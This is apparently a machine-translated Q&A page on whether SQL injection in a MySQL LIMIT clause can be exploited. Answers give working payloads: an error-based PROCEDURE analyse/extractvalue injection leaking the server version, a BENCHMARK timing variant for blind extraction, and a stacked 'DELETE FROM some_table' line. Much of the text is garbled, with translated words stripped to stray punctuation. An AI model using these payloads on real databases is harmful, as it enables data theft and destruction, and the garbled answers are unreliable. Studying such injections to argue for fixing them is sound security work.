All geek questions in one place

SQL Injection and LIMIT Clause

This question is to resolve the dispute between me and the employee.

Let's say we have the following query executed on a standard LAMP server.

SELECT field1, field2, field3
FROM some_table
WHERE some_table.field1 = 123
ORDER BY field2 DESC
LIMIT 0, 15

Now suppose the limit clause is vulnerable to SQL injection.

LIMIT [insert anything here], [also insert anything here]

My colleague's point is that there is no way to use this injection, so there is no need to avoid it (since it requires more computing power, etc.).

I think her reasoning is stupid, but I cannot figure out how to prove my mistake by finding an example.

I can’t use UNION, because the query uses the sentence ORDER BY, and the MySQL user executing the query does not have privileges FILE, so the use is INTO OUTFILEalso out of the question.

, - , ?

: PHP, .

+4
5

LIMIT SQL-, ORDER BY, Maurycy Prodeus :

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1
       procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

! . , , - ( , ), . , ? ?

, - . :

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1
PROCEDURE analyse((select extractvalue(rand(),
concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

. , SLEEP . BENCHMARK.

+4

:

1; DELETE FROM some_table WHERE 1; --

, 1 some_table, DELETE some_table. .

+1

SQL Injection , " [...] SQL". , SQL.

, - . , . , , - - , :

  • , .
  • UNION.
  • , INTO OUTFILE/INTO DUMPFILE.
  • - , , , . , / ?
+1

SQL- , , , . , , , .

. , , .

0

, , . , , "". , sql, - , . , , :

, , ';'. .

I just did this on my local mysql server:

SELECT * FROM city order by ID desc limit 0,15; SELECT * FROM city

However, in the strong case, when there is an absolute 0% chance, someone can change the statement, you just do not even want to receive the possible changed data. There must be a reason why you are using LIMIT dynamically. As soon as a person can change your cause, you have already failed. This is not even the risk of loss, data loss, or what ever. You do not want any manipulation.

0
source

Source: https://habr.com/ru/post/1535186/

More articles:


All Articles